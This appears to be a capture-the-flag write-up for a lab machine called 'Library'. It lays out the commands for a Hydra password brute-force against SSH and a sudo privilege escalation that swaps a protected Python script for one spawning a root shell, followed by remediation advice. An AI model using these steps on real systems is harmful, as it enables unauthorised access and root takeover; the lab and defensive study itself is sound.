Target IP: library.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (meliodas) & Root (root.txt) Flags

1. Executive Summary

“Library” is a Linux machine hosting a simple blog. Initial access is obtained by identifying a valid username (meliodas) from the web application and performing a dictionary attack (Hydra) against the SSH service. Privilege escalation exploits a misconfigured sudo permission that allows the user to run a Python script as root. Due to file permission restrictions, we delete the original script and replace it with a malicious one to spawn a root shell.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port scanning.
  • T1078 (Valid Accounts): identifying meliodas via web enumeration.
  • T1110 (Brute Force): Hydra SSH cracking.
  • T1548.003 (Sudo and Sudo Caching): Exploiting sudo rights on a writable script.

2. Operational Setup

Host Configuration

echo "10.10.x.x library.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Your scan shows a standard Linux server profile:

  • 22/tcp (SSH): OpenSSH 7.2p2.
  • 80/tcp (HTTP): Apache 2.4.18.

B. Web Enumeration

Accessing http://library.thm:

  • Content: A blog about “The Seven Deadly Sins” (Anime reference).
  • Robots.txt: You noted / is disallowed (standard for some CTFs to verify robots checking).
  • Username Discovery: Reading the posts (specifically the author name) or comments often reveals the user meliodas.

C. Credential Attacks (Hydra)

Since we have a username (meliodas) and open SSH, we attempt to crack the password.

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://library.thm
  • Result: meliodas : iloveyou1 (or similar from Rockyou).

4. Initial Access: SSH

We log in with the cracked credentials.

ssh meliodas@library.thm

User Flag: /home/meliodas/user.txt.


5. Privilege Escalation: The Python Script

Enumeration

We check for sudo privileges immediately.

sudo -l

Output:

User meliodas may run the following commands on library:
    (root) /usr/bin/python3 /home/meliodas/bak.py

The Vulnerability: Directory Permissions

We inspect the file permissions.

ls -la /home/meliodas/bak.py
# -r--r--r-- 1 root root ... bak.py
  • The Problem: The file is owned by root and is read-only for everyone. We cannot edit it directly (nano bak.py -> Permission denied).
  • The Flaw: The file is located in /home/meliodas. As the owner of the directory, meliodas has the right to modify the directory contents (i.e., delete files and create new ones).

Exploitation (The Swap)

You correctly identified that since you can’t edit the file, you must replace it.

  1. Delete the Original:
rm /home/meliodas/bak.py
  1. Create the Malicious Script: We create a new file with the same name. Since we are creating it, we own it and can write to it.
echo 'import pty; pty.spawn("/bin/bash")' > /home/meliodas/bak.py
  1. Execute: We run the script using the specific sudo command allowed.
sudo /usr/bin/python3 /home/meliodas/bak.py

Result: The python3 binary runs as root (via sudo), executes our code, and pty.spawn gives us an interactive shell.

# whoami
root

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. SSH Hardening:
  • Disable password authentication for SSH (PasswordAuthentication no). Use SSH keys instead.
  • Implement Fail2Ban to block IPs performing brute-force attacks.
  1. Sudo Configuration:
  • Never allow users to run scripts located in their own home directories (or any directory they have write access to) as root.
  • If a script must be run as root, it should be owned by root, located in a protected directory (like /opt/scripts or /usr/local/bin), and have strict permissions (700 or 755).